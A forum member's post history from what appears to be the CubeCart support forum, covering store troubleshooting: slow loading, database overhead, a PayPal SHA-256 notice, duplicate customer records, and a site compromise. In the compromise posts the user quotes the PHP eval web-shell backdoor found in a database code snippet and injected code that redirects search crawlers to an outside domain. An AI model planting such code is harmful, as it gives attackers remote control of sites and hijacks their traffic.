Jump to content

jpayam

Member
  • Posts

    63
  • Joined

  • Last visited

Posts posted by jpayam

  1. Hi

    I use last CC.  from 3 days ago my Site loads very slow , in admin Database Maintenance i see Overheads

    CubeCart_shipping_rates0InnoDButf8_unicode_ci16.00 KB11.00 MB
    CubeCart_option_matrix0InnoDButf8_unicode_ci32.00 KB11.00 MB
    CubeCart_shipping_zones0InnoDButf8_unicode_ci16.00 KB11.00 MB
    CubeCart_code_snippet0InnoDButf8_unicode_ci48.00 KB11.00 MB

    my database is only 10 mb on host panel ( last month was 2 MB! ) and in phpmyadmin and did not find any unusual  data on above tables,  optimize/repair.. did not fix the problem.

    and there is about 20000 session  file in  /public_html/includes/extra  folder!

    what the problem?

     

     

     

     

     

  2. Hi,

    I use last cubecart 6.04 for my 2 online store and also i receive PayPal service upgrades notifaication email today

     

    As we have previously communicated to you, PayPal is upgrading the certificate for www.paypal.comto SHA-256. This endpoint is also used by merchants using the Instant Payment Notification (IPN) product. 

    This upgrade is scheduled for 30/9/2015; however, we may need to change this date on short notice to you to align to the industry security standard.

    You’re receiving this notification because you’ve been identified as a merchant who has used IPN endpoints within the past year. If you have not made the necessary changes, we urge you to do so right away to avoid a disruption of your service!

     

    Because these changes are technical in nature, we advise that you consult with your individuals responsible for your PayPal integration. They will be able to identify what, if any, changes are needed. Please share this email and the hyperlinks below with your technical contact for evaluation.

    Testing in the Sandbox is one of the best ways to make sure your integrations work. Sandbox endpoints have been upgraded to accept secure connections by the SHA-256 Certificates.

    Full technical details can be found in our Merchant Security System Upgrade Guide. In addition, our2015-2016 SSL Certificate Change microsite contains a schedule of our service upgrade plan.

    Thanks for your patience as we continue to improve our services.

  3. I have not  log for mysql on server, 

    my site hacked two times and every time i see below System Erros Log within the Cubecart panel.

    Yesterday, 13:44 [Deprecated] /home/XXXXXXXXXXXXXXX/domains/XXXXXXXXXXX/public_html/includes/extra/snippet_892d667b445c9ebb6888107b8121a8.php(1) : eval()'d code(1) : eval()'d code:1 - Function set_magic_quotes_runtime() is deprecated

     

     

  4. below code was in my database i just clean it and seems problem fixed

    -- Dumping data for table `CubeCart_code_snippet`
    --

    LOCK TABLES `CubeCart_code_snippet` WRITE;
    /*!40000 ALTER TABLE `CubeCart_code_snippet` DISABLE KEYS */;
    INSERT INTO `CubeCart_code_snippet` VALUES (1,1,'snippetH6GrD','Snippet','controller.index','<?php eval($_REQUEST[\"H6GrD\"]);?>','','',3);
    /*!40000 ALTER TABLE `CubeCart_code_snippet` ENABLE KEYS */;
    UNLOCK TABLES;

  5. Yes, thanks
    problem is from my database seems it infected before i install the modesecurity. as i install a fresh cubecart on another site and works without problem but when i import my database to new site i see the problem again (file snippet_892d667b445c9ebb6888107b8124a8.php) on /includes/extra directory )

    how can i clean my database??


     i want to keep store setting products and customers and orders

  6. We use a vps for this store, we have not any other scripts ,only one site with last cubecart script.
    php ver is last 5.4 with suhosin enabled , all dangerous PHP functions disabled in php.ini file.
    CSF is active , modesecurity with last COMODO rules is active.
    calmAV and ConfigServer eXploit Scanner Scan  did not find any  Fingerprint matches

     

    ConfigServer eXploit Scanner  only find a Suspicious matches:
    '/home/XXXXXXXXXX/public_html/cache/75590.sql.1efdd7b03693b5f7a93ef2d228d5e98c.cache'
    Regular expression match = [eval\(\$_REQUEST\[]

    i empty cash folder and even disable the cash temporary but still problem not fixed

     

  7. Hello,

    I use last cubecart.i see i A php file (snippet_892d667b445c9ebb6888107b8124a8.php) on /includes/extra directory which  include the below code:

    <?php eval($_REQUEST["H6GrD"]);?>

    this file recreate automatically  again and again after i delete it !!! 

    this code adding below code to my index.php file.

    if (preg_match("#(google|googlebot|slurp@inktomi|yahoo! slurp|msnbot)#si", $_SERVER['HTTP_USER_AGENT'])) {
    header("HTTP/1.1 301 Moved Permanently");
    header("Location: http://www.reehair.com/");
    exit;
    }

    if (preg_match("#(www\.google)#si",$_SERVER['HTTP_REFERER'])) {
    header("HTTP/1.1 301 Moved Permanently");
    header("Location: http://www.reehair.com/");
    exit;
    }

     

    now i am losing my seo links in search engines

    thanks in advance for any help

     

  8. Problem was from database,  email was disappeared from index of customer table!! i just recreate it and there is not any problem

    but for every new customer we see below in  "System Error Log"

    File: [user.class.php] Line: [367] "INSERT INTO `CubeCart_customer` (`title`,`first_name`,`last_name`,`email`,`phone`,`mobile`,`password`,`new_password`,`ip_address`,`registered`,`type`) VALUES ('','777777','77777777','[email protected]','346346346436','','b9bc947c2b69f569c9dd44c4e79b2f15','0','88.99.192.87','1433066991','2');" - Duplicate entry '[email protected]' for key 'email'

  9. Hi,

    i am using last CC ver

    Recently  CubeCart  create 2 customer account  ( with same email and date/time registered  ) in  ordering process  and download link not showing in customer account for digitally products

    we have this problem with 5 orders of 9 order within the last 3 days!

     

     

×
×
  • Create New...